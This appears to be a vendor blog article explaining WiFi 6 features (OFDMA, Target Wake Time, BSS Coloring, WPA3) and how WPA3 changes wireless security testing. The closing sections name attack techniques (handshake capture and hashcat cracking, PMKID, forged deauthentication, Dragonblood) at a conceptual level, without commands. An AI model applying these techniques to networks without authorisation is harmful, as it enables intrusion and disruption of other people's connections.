WiFi 6 (802.11ax) Explained
Table of Contents
Efficiency Over Raw Speed
Every WiFi generation before 802.11ax (WiFi 6) focused primarily on peak throughput. Faster modulation, wider channels, more spatial streams - all aimed at pushing the maximum data rate higher. WiFi 6 shifted the priority. Its theoretical maximum of 9.6 Gbps is only a 37% increase over WiFi 5's 6.9 Gbps. The real improvements are in how WiFi 6 handles many devices on the same network.
The problem WiFi 6 solves is density. A stadium with 50,000 people, an office with 200 devices per floor, a home with 30 IoT gadgets - these environments break older WiFi. Not because the access point lacks bandwidth, but because the protocol wastes airtime with inefficient scheduling. WiFi 5 gives the entire channel to one device at a time. With dozens of devices competing for airtime, each one waits longer and longer for its turn.
WiFi 6 introduces mechanisms that let the access point serve multiple devices in a single transmission, schedule device activity to reduce contention, and manage interference between neighboring networks. The result is better performance for every device, not just the one closest to the access point.
OFDMA - Sharing the Channel
OFDMA (Orthogonal Frequency Division Multiple Access) is the most important technology in WiFi 6. It allows the access point to divide a channel into smaller frequency allocations called Resource Units (RUs) and assign different RUs to different clients in the same transmission.
In WiFi 5, a 20 MHz channel is one block. The access point transmits to one client, waits for an acknowledgment, then transmits to the next. With OFDMA, the same 20 MHz channel is divided into up to nine RUs. The access point can assign each RU to a different client and transmit to all of them simultaneously in a single OFDM symbol.
This matters most for small packets. IoT devices sending temperature readings, voice-over-WiFi frames, web browsing ACKs - these are all tiny transmissions that waste most of a full channel allocation. OFDMA lets the access point pack many small transmissions into one channel use, dramatically improving efficiency.
OFDMA works on both downlink (access point to clients) and uplink (clients to access point). Uplink OFDMA uses trigger frames - the access point tells each client which RU to use and when to transmit, coordinating their uplink transmissions so they do not collide.
graph TD
subgraph "WiFi 5 - OFDM - One Client at a Time"
A1["Time Slot 1: Client A gets full channel"] --> A2["Time Slot 2: Client B gets full channel"]
A2 --> A3["Time Slot 3: Client C gets full channel"]
A3 --> A4["Time Slot 4: Client D gets full channel"]
end
subgraph "WiFi 6 - OFDMA - Multiple Clients Simultaneously"
B1["Single Time Slot"]
B1 --> B2["RU 1: Client A"]
B1 --> B3["RU 2: Client B"]
B1 --> B4["RU 3: Client C"]
B1 --> B5["RU 4: Client D"]
end
subgraph "Result"
C1["OFDM: 4 time slots needed"]
C2["OFDMA: 1 time slot needed"]
end
OFDMA serves four clients in one time slot where OFDM needs four separate slots
TWT - Scheduled Sleep for IoT
Target Wake Time (TWT) lets the access point negotiate specific times for each client to wake up and transmit. Between those scheduled times, the client can enter deep sleep mode. This is transformative for battery-powered IoT devices.
Before TWT, a WiFi client had two sleep options. It could stay awake all the time (high power consumption) or use legacy power save mode (which requires periodic wake-ups to check for buffered frames, plus the overhead of power save poll frames). Neither option was efficient enough for devices that need to run for months on a coin cell battery.
With TWT, a temperature sensor can negotiate to wake up once every 30 minutes, transmit its reading, and go back to sleep. The access point buffers any downlink data for that device and delivers it during the scheduled TWT window. Between windows, the device draws minimal current.
TWT also reduces contention. If 100 IoT devices on a network all negotiate different TWT schedules, they naturally spread their transmissions across time instead of all competing for the channel at once. This improves airtime efficiency even beyond what OFDMA provides.
BSS Coloring - Reducing Interference
In dense WiFi environments - apartment buildings, office complexes, conference halls - multiple access points operate on the same channel. Before WiFi 6, a device hearing any frame on its channel would defer transmission, even if the frame came from a neighboring network that poses no interference risk. This is called the hidden node problem and the exposed node problem.
BSS Coloring assigns a 6-bit color code (0-63) to each BSS (Basic Service Set - essentially each access point's network). This color is embedded in every frame's PHY header. When a device detects a frame, it checks the BSS color before deciding whether to defer.
If the frame has the same color (same BSS), the device defers as normal. If the frame has a different color (different BSS), the device can choose to transmit anyway if the received signal strength is below a threshold. This allows nearby networks on the same channel to operate more independently, increasing overall throughput in dense deployments.
graph LR
subgraph "Without BSS Coloring"
A1[AP 1 - Channel 6] -->|Frame| C1[Client]
A2[AP 2 - Channel 6] -->|Frame| C1
C1 -->|"Defers for BOTH APs"| D1[Wasted airtime]
end
subgraph "With BSS Coloring"
B1["AP 1 - Channel 6 - Color 3"] -->|"Color 3 frame"| C2[Client of AP 1]
B2["AP 2 - Channel 6 - Color 7"] -->|"Color 7 frame"| C2
C2 -->|"Defers only for Color 3"| D2[Less wasted airtime]
C2 -->|"Ignores Color 7 if weak"| D3[Can transmit over it]
end
BSS Coloring lets devices ignore weak signals from other networks instead of deferring to all traffic
1024-QAM and Other Improvements
1024-QAM: WiFi 5 used 256-QAM, encoding 8 bits per symbol. WiFi 6 moves to 1024-QAM, encoding 10 bits per symbol - a 25% increase in data per symbol. The catch: 1024-QAM requires a very clean signal. It only works at short range with strong signal strength. At medium to long range, the modulation automatically drops to lower rates.
Uplink MU-MIMO: WiFi 5's MU-MIMO was downlink only. WiFi 6 adds uplink MU-MIMO, allowing multiple clients to transmit to the access point simultaneously. Combined with OFDMA, this significantly improves uplink efficiency in multi-device environments.
Longer OFDM symbols: WiFi 6 uses a 12.8-microsecond OFDM symbol (compared to 3.2 microseconds in WiFi 5), with a longer guard interval. This makes transmissions more robust against multipath interference in outdoor and large indoor environments.
Dual-band return: WiFi 6 operates on both 2.4 GHz and 5 GHz, unlike WiFi 5's 5 GHz-only approach. WiFi 6 on 2.4 GHz brings OFDMA, TWT, and BSS Coloring to the crowded 2.4 GHz band, which benefits IoT devices that rely on 2.4 GHz for range.
WPA3 - Mandatory for WiFi 6
The Wi-Fi Alliance requires WPA3 support for WiFi 6 certification. This is the most significant security change since WPA2 replaced WPA in 2004.
WPA3-Personal replaces the Pre-Shared Key (PSK) exchange with SAE (Simultaneous Authentication of Equals). SAE is a zero-knowledge proof protocol based on the Dragonfly key exchange. The critical improvement: even if an attacker captures the entire authentication exchange, they cannot perform an offline dictionary attack. Each authentication attempt requires real-time interaction with the access point, making brute-force attacks impractical.
WPA3 also mandates Protected Management Frames (PMF), which encrypts management frames like deauthentication and disassociation. This directly impacts deauthentication attacks - a core technique in WiFi security testing. With PMF enabled, forged deauthentication frames are detected and dropped.
Important nuance: WPA3 certification requires support, not exclusive use. Many WiFi 6 routers ship in "WPA2/WPA3 transition mode" that accepts both protocols. In transition mode, WPA2 clients can still connect using PSK, and deauthentication attacks may still work against WPA2 clients. Only when the network is configured for WPA3-only mode are the full security benefits enforced.
flowchart TD
subgraph "WPA2 vs WPA3 - Attack Impact"
A[Attacker captures authentication] --> B{Protocol?}
B -->|WPA2 PSK| C[Offline dictionary attack]
C --> D["hashcat: billions of guesses/second"]
D --> E["Weak passwords cracked in minutes"]
B -->|WPA3 SAE| F[No offline attack possible]
F --> G["Each guess requires network interaction"]
G --> H["Rate-limited by access point"]
end
subgraph "Deauthentication"
I[Forged deauth frame] --> J{PMF enabled?}
J -->|No - WPA2| K[Client disconnects]
J -->|Yes - WPA3| L[Frame rejected]
end
WPA3 eliminates offline dictionary attacks and protected management frames block forged deauthentication
What Changes for Security Research
WiFi 6 with WPA3 changes the security research playbook in several important ways.
Handshake capture becomes less useful: On WPA3-only networks, capturing the authentication exchange does not enable offline cracking. The PMKID attack and 4-way handshake capture techniques that work against WPA2 are ineffective against WPA3-SAE. Researchers testing WPA3 networks need different approaches - timing side-channel attacks against SAE (like Dragonblood, discovered in 2019 but largely patched) or focusing on implementation flaws rather than protocol weaknesses.
Deauthentication testing requires nuance: PMF blocks forged deauthentication in WPA3 mode. In transition mode (WPA2/WPA3), deauthentication may still work against WPA2 clients. Testing deauth resilience now requires identifying which clients use WPA3 vs WPA2 and testing each separately.
2.4 GHz remains relevant: WiFi 6 on 2.4 GHz means the BLEShark Nano can detect WiFi 6 access points broadcasting on 2.4 GHz. The scanner will show the SSID, channel, and encryption type. However, many WiFi 6 features (OFDMA, TWT) are transparent to a basic scanner - they affect how traffic is scheduled, not the beacon frame structure.
IoT testing grows: TWT-enabled IoT devices on WiFi 6 have different behavior patterns than always-on devices. They are only reachable during their TWT windows, which creates new testing challenges for device security assessments. You cannot scan a sleeping device.
WiFi 6 does not make all existing tools obsolete. The BLEShark Nano's WiFi scanner, deauthentication testing, and handshake capture all remain functional against the vast majority of networks running WPA2 on 2.4 GHz. But as WPA3 adoption increases, the effectiveness of traditional capture-and-crack techniques will decline. Smart researchers are already adapting their methodologies.
Get the BLEShark Nano - $36.99+